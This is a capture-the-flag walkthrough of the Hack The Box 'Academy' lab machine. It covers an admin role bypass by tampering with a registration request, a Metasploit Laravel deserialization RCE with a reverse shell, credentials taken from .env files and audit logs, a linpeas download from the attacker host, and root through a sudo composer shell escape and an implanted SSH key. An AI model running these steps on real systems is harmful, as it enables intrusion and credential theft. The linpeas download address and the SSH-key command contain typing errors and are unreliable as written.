Academy HTB Walkthrough

Machine Info

• OS: Linux
• Difficulty: Easy
• Points: 20
• Release: 07 Nov 2020
• IP: 10.10.10.215

Network Scanning

As every single time we hack a machine, we start by running nmap to determine open ports and services, and we found the following

• ssh:22
• http:80
• mysqlx:33060

1

nmap -p- -T4 -A  10.10.10.215

As depicted from nmap result, we need to add the hostname “academy.htb” to /etc/hosts file so the target’s IP address can be resolved to its hostname locally.

1
2

vi /etc/hosts
10.10.10.215	academy.htb

Enumeration

HTTP Enumeration

Let’s start enumerating http service over port 80. Firstly, we run gobuster to see the available directories/files that are existed on the target’s web server. The gobuster’s result shows to us there is an admin.php file that perhaps be usefull for us later.

1

gobuster dir --url http://academy.htb/ -w /usr/share/wordlists/dirb/common.txt

Then we go to the website to take a look over what is going there and we found a home page that has a register and login page. So, we start by registering to create an account and use burp suite to intercept the communication between the website and the web server, and see what is occurring in the middle. While registering, we decided to change “roleid=0” to “roleid=1” then send the request. After we registered successfully, we noticed that the web server redirects us to login.php page directly. So, we changed login.php to admin.php then send the request.

1

http://academy.htb

Now let’s login to admin.php with our created account. After we logged in, we found a subdomain named “dev-staging-01.academy.htb”, so let’s add it also to /etc/hosts file.

1
2

vi /etc/hosts
10.10.10.215	academy.htb dev-staging-01.academy.htb

Afterwards at the found subdomain “dev-staging-01.academy.htb”, we found an important information such as “APP_NAME” and “APP_KEY” which will help us in the exploitation later.

Exploitation

From the APP_NAME value, we know that we deal with a Laravel app. So, we use searchsploit to search for any available exploit and we actually found a RCE exploit that is a part of Metasploit framework.

1

searchsploit laravel

Therefore, we run metasploit and set the required options then run the exploit and successfully we got a reverse shell. After that we spawn a tty shell (teletype shell) so the shell be more interactive.

1
2
3
4
5
6
7
8
9
10
11
12
13

msfconsole
search PHP Laravel Framework
use 0	or	use exploit/unix/http/laravel_token_unserialize_exec
options
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set RHOSTS 10.10.10.215
set VHOST dev-staging-01.academy.htb
set LHOST 10.10.16.9
options
run
id
help
shell

Privilege Escalation

cry0l1t3

Subsequently, we need to escalate our privileges to root or any other user has higher privileges. We list home directory to see who are users on this machine and we noticed that there are two users have been mentioned earlier at the admin page after we logged in,so let’s keep that in our mind perhaps help us later. Then we use google to search for laravel documentation and we found that laravel.com which helps us to take a look over “.env” file that may contain some credentials and senesitive data. Upon that, we use the find command to locate the “.env” file on the machine and we succeeded to find a password named “mySup3rP4s5w0rd!!” at that path “/var/www/html/academy/.env”.

1
2
3
4
5

cd /home
ls
find / -type f -name .env 2>/dev/null
cat /var/www/html/academy/.env
cat /var/www/html/htb-academy-dev-01/.env

Then we try use our found password to login through ssh as “cry0l1t3” user or “mrb3n” user and we are successfully logged in as cry0l1t3, as well as we got our user flag.

1
2
3

ssh cry0l1t3@10.10.10.215
id
cat user.txt

mrb3n

Afterwards, again we need to escalate our privileges to higher user. So, we transfered linpeas script from our kali machine to the target machine using (wget, nc, scp, etc…) then we run the script. While we take a look over the result, we noticed that the password of “mrb3n” user is “mrb3n_Ac@d3my!” and it is located at “/var/log/audit/audit.log.3” as ASCII HEX value of data variable.

1
2

# On kali terminal
python -m SimpleHTTPServer

1
2
3
4
5

# On target terminal
cd /tmp
wget http://1010.16.9:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Also, we can find mrb3n’s password manually by looking at the files content at “/var/log/audit” then using grep to search for su command. After that we take the value of data variable and decode it as ASCII HEX and it also gives us the same password that we have found using linpeas script.

1
2

cd /var/log/audit
cat * | grep 'comm="su"'

Then we use su command to switch to mrb3n user using its password. After that we need to reach to root user, so we check sudo rights of mrb3n user and we found that he can run “/usr/bin/composer” command as root user.

1
2
3

su mrb3n
id
sudo -l

root

We use gtfobins website to search for an exploit related to composer. We found the following exploit and after applying it we successfully got a root shell and root flag.

1
2
3
4
5
6
7

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
id
cd /root
ls
cat root.txt

or we can also modify the script in the exploit to transfere our root ssh public key to the target machine at “/root/.ssh/authorized_keys” in order to get more reliable shell then login via ssh as root using private key.

1
2
3
4

# On target terminal
TF=$(mktemp -d)
echo '{"scripts":{"ssh":"put_ssh_public_key_here' >> /root/.ssh/authorized_keys"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script ssh

1
2
3
4
5

# On kali terminal
ssh root@10.10.10.215 -i /root/.ssh/id_rsa
id
cd /root
cat root.txt